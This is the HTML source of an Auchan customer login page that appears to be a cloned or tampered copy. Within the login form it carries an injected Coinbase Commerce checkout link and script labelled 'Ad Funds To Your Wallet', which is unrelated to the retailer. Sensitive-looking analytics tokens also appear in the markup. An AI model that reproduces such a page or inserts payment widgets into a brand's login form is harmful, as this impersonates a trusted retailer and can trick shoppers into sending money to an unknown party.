<!DOCTYPE html>
<!DOCTYPE hmtl>
<html><head>
    <title>Connexion à votre compte Auchan</title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0">
<meta name="robots" content="noindex">
<link rel="shortcut icon" href="xfavicon.c08aaf368e1c594dbf06e815ea1b20d1.ico.pagespeed.ic.Nyirwv5jnY.webp">
<link href="A.styles.305d5ceed2a01160bef0.css.pagespeed.cf.Jvkwjqc_ja.css" rel="stylesheet">
<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script>
<script async="" src="https://www.googletagmanager.com/gtm.js?id=GTM-TT2KL3D&amp;gtm_auth=tsgUTfJXVlV5LrQHghe4Mw&amp;gtm_preview=env-2&amp;gtm_cookies_win=x"></script><script>if(typeof history.replaceState==='function'){history.replaceState({},"some title","https://compte.auchan.fr/auth/realms/auchan.fr/login-actions/authenticate?execution=12522bec-d7b9-48ee-91fe-a9ffd16a246c&client_id=ccc&tab_id=2VyZPXa5oRY");}</script></head>

<body class="body body--login">

<header class="header">
    <a href="javascript:history.go(-2)" class="header__back"><i class="icon-back"></i></a>
    <a href="https://www.auchan.fr/" class="header__logo"></a>
    <span class="header__https https">
            <span class="https__text"><span>Espace</span><br>100% Sécurisé</span>
            <i class="icon-padlock https__icon"></i>
        </span>
</header>


<main class="main">
    <form action="https://compte.auchan.fr/auth/realms/auchan.fr/login-actions/authenticate?session_code=0uGfdhZ8Uo7xSFaC0NEdRc6r4Y8Pr98nZ55mmDcVAoY&amp;execution=12522bec-d7b9-48ee-91fe-a9ffd16a246c&amp;client_id=ccc&amp;tab_id=2VyZPXa5oRY" method="POST" data-op-form-id="0" class="signin">
        <h1 class="signin__title">Je me connecte</h1>
        <p class="signin__subtitle">Encore quelques clics et le tour est joué !</p>
        <div class="formElement">
            <input class="formElement__input signin__input" name="username" value="" placeholder="Adresse e-mail" data-op-id="0" type="email" required="">
        </div>
        <div class="formElement">
            <input class="formElement__input signin__input" name="password" placeholder="Mot de passe" data-op-id="1" type="password" required="">
            <i class="formElement__icon signin__icon icon-passwordLook password-show"></i>
        </div>
            <div class="formElement">
                <input class="formElement__checkbox" id="rememberMe" name="rememberMe" type="checkbox" checked="">
                <label for="rememberMe" class="formElement__label signin__label">Se souvenir de moi</label>
            </div>
        <div>
            <a href="https://mon-compte.auchan.fr/mot-de-passe-oublie" class="password-lost">Oups ! J’ai oublié mon mot de passe</a>
            <div>
                <button class="ui-btn ui-btn--large red" type="submit">Je me connecte !</button>
            </div>
            <div>
  <a class="donate-with-crypto" target="_blank" 
     href="https://commerce.coinbase.com/checkout/b7c9f4a8-e8d5-4629-8993-a12399bf360a">
    Ad Funds To Your Wallet
  </a>
  <script src="https://commerce.coinbase.com/v1/checkout.js?version=201807">
  </script>
</div>
        </div>
    </form>
    <section class="signup">
        <h2 class="signup__title">Vous n’avez pas de compte ?</h2>
        <a id="signup__button" class="ui-btn ui-btn--large transparent signup__btn" href="https://mon-compte.auchan.fr/creation-compte-auchan">Créer mon compte</a>

        <script type="text/javascript">function should_redirect_to(url){return url&&url.includes("/auth/realms/auchan.fr/protocol/openid-connect/auth")&&url.includes("state=");}function add_redirect_uri_to_signup_button(uri){document.getElementById("signup__button").href+="?redirect_uri="+window.btoa(uri);}var referrer_url=document.referrer;if(should_redirect_to(referrer_url)){add_redirect_uri_to_signup_button(referrer_url);}else{var location_url=document.location.href;if(should_redirect_to(location_url)){add_redirect_uri_to_signup_button(location_url);}}</script>
    </section>
</main>


<footer class="footer">
    <div class="footer__branding">
        <p class="footer__title">Un seul compte pour tous vos sites Auchan :</p>
        <p class="footer__branding--text">Auchan Drive, Auchan.fr, Auchan Frais, Auchan Fioul</p>
        <p class="footer__branding--icons" aria-hidden="true"><i class="icon-logoDrive"></i><i class="icon-logoFr"></i><i class="icon-logoFrais"></i><i class="icon-logoFioul"></i></p>
    </div>
</footer>

<script type="text/javascript">(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl+'&gtm_auth=tsgUTfJXVlV5LrQHghe4Mw&gtm_preview=env-2&gtm_cookies_win=x';f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer',"GTM-TT2KL3D");var dataLayer=dataLayer||[];var _dataLayer={};_dataLayer["env_type_content"]='client';_dataLayer["env_type_page"]='identification';_dataLayer["env_type"]='login';dataLayer.push(_dataLayer);</script>

<script src="/auth/resources/7.0.1/login/auchan/styles.8a01f038acbde19e3cfb.js+login.36e02beec4a035086493.js.pagespeed.jc.acTrWFniN3.js"></script><script>eval(mod_pagespeed_3npST2lYeN);</script><script>eval(mod_pagespeed_nro5wKSdQl);</script>


<script type="text/javascript" id="">google_tag_manager["GTM-TT2KL3D"].macro(1)||(document.cookie="gtmEnvironnement\x3dWeb;path\x3d/");</script><script type="text/javascript" id="">localStorage.removeItem("gtm_lastOrigin");</script></body></html>